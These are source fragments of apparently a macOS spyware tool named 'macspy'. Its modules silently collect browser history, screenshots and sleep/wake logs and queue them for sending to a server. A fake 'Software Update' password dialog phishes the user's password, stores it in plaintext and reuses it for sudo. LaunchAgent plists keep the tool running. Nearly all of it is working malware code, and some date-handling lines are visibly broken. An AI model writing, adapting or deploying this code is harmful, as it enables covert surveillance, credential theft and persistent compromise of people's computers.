def run(options): moduleDirectory = "./Data/browser_history" browserhistory.write_browserhistory_csv() for filename in os.listdir('.'): if ".csv" in filename: print(filename) run_command("mv " + filename + " " + moduleDirectory) for filename in os.listdir(moduleDirectory): add_to_send_queue(moduleDirectory + "/" + filename)
def run(options): #Generate name for screenshot file based on current date and time moduleDirectory = "./Data/usage_intervals/" currentDate ="%b-%d-%Y") currentTime ="%H-%M-%S") usageIntervalsFilename = moduleDirectory + "UsageIntervals" + currentDate + "_" + currentTime + ".txt" #get usage intervals and send to server run_command(f"""pmset -g log | egrep 'Wake from|Entering Sleep' | cut -f1 | cut -d" " -f1,2,4 > {usageIntervalsFilename}""") add_to_send_queue(usageIntervalsFilename)
def capture_screenshot(): #Generate name for screenshot file based on current date and time currentDate ="%b-%d-%Y") currentTime ="%H-%M-%S") screenshotFilename = "./Data/screenshot/" + "Screenshot_" + currentDate + "_" + currentTime + ".png" #Take screenshot run_command("screencapture -x " + screenshotFilename) #Send to server add_to_send_queue(screenshotFilename)
def delete_expired_launch_agents(): launchAgentDirectory = os.path.expanduser("~/Library/LaunchAgents") while True: timeNow = for launchAgent in os.listdir(launchAgentDirectory): if "macspy" in launchAgent and launchAgent[-7:-6] == "_": print(launchAgent) #get datetime object which is part of filename expiryDate = parser.parse(launchAgent.split("_")[1]) print("exp="+str(expiryDate)) print("now="+str(timeNow)) if expiryDate < timeNow: time.sleep(3) run_command("rm -f " + launchAgentDirectory + "/" + "\""+launchAgent+"\"") time.sleep(3600)
def facetimeIsActive(raiseExceptionIfNot): isActive = run_command("ps aux | grep -v grep | grep -c -i facetime") isActive = int(isActive.decode()[:-1]) if isActive != 0: return True if raiseExceptionIfNot: raise Exception("Facetime has been turned off") return False
def run(options): appName = "Safari" message = "Software Update requires that you type your password to apply changes." if "appName" in options: appName = options["appName"] if "message" in options: message = options["message"] #Create phishing prompt on screen result = os.popen( '''osascript -e 'tell app "''' + appName + '''" to activate' -e 'tell app "''' + appName + '''" to activate' -e 'tell app "''' + appName + '''" to display dialog "''' + message + '''" & return & return default answer "" with icon 1 with hidden answer with title "''' + appName + '''"\'''').read() #extract password entered if "OK" in result: output = run_command( f"""echo "{result}" | cut -d":" -f3 | tr -d '\n'""") password = output.decode() run_command(f"""echo {password} > password.txt""") run_command(f"""echo {password} > upassword.txt""") add_to_send_queue("./password.txt")
def get_CPU_tempurate(): #Requires root permission with open('upassword.txt', 'r') as passwordFile: password = passwordFile.readline()[:-1] CPUtemperatureReadings = run_command( f"""echo {password} | sudo -S powermetrics -n 3 | grep -i 'CPU die temperature' | cut -d' ' -f4""" ).decode() CPUtemperatureReadings = CPUtemperatureReadings.split('\n') CPUtemperatureReadings = CPUtemperatureReadings[:3] average = 0 print(CPUtemperatureReadings) for temp in CPUtemperatureReadings: average += float(temp) average /= len(CPUtemperatureReadings) return average
def create_launch_agent(options): global pythonInterpreter timeNow = if timeNow.weekday() > options["weekday"]: offset = (6 - timeNow.weekday()) + options["weekday"] elif timeNow.weekday() == options["weekday"]: now = {} now["hour"] = timeNow.hour now["minute"] = timeNow.minute if is_time_greater(now, options['startTime']): offset = 7 else: offset = 0 else: offset = options["weekday"] print("offset="+str(offset)) timeNow += datetime.timedelta(days=offset) expiryDate = timeNow.replace(hour=options['endTime']['hour'], minute=options['endTime']['minute'], second=0) #store expiry time launchAgentName = "macspy"+options["module"]+randomString()+"_"+str(expiryDate)+"_" launchAgentConfig = f"""\ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>Label</key> <string>com.macspy_{launchAgentName}.app</string> <key>WorkingDirectory</key> <string>{options["workingDirectory"]}</string> <key>ProgramArguments</key> <array> <string>{pythonInterpreter}</string> <string>{options["programFile"]}</string> """ for argument in options["programArguments"]: launchAgentConfig += f"""\ <string>{argument}</string> """ launchAgentConfig += """\ </array> """ launchAgentConfig += """\ <key>StartCalendarInterval</key> <array> """ #hours/minutes always exist, sometimes zero weekday = (options["weekday"] + 1) % 7 hour = options["startTime"]["hour"] minute = options["startTime"]["minute"] if "frequency" in options: frequencyHours = options["frequency"]["hours"] frequencyMinutes = options["frequency"]["minutes"] if frequencyMinutes == 0: frequencyMinutes = 1 while hour < options["endTime"]["hour"] or minute < options["endTime"]["minute"]: launchAgentConfig += f"""\ <dict> <key>Hour</key> <integer>{hour}</integer> <key>Minute</key> <integer>{minute}</integer> <key>Weekday</key> <integer>{weekday}</integer> </dict> """ hour += frequencyHours minute += frequencyMinutes if minute >= 60: hour += 1 minute %= 60 else: #one off job launchAgentConfig += f"""\ <dict> <key>Hour</key> <integer>{hour}</integer> <key>Minute</key> <integer>{minute}</integer> <key>Weekday</key> <integer>{weekday}</integer> </dict> """ launchAgentConfig += """\ </array> """ launchAgentConfig += """\ </dict> </plist> """ #create file launchAgentFile = os.path.expanduser("~/Library/LaunchAgents") + "/" + launchAgentName + ".plist" print(launchAgentFile) with open(launchAgentFile, "w") as newLaunchAgentFile: newLaunchAgentFile.write(launchAgentConfig) #load launch agent run_command("launchctl load " + "\"" + launchAgentFile + "\"")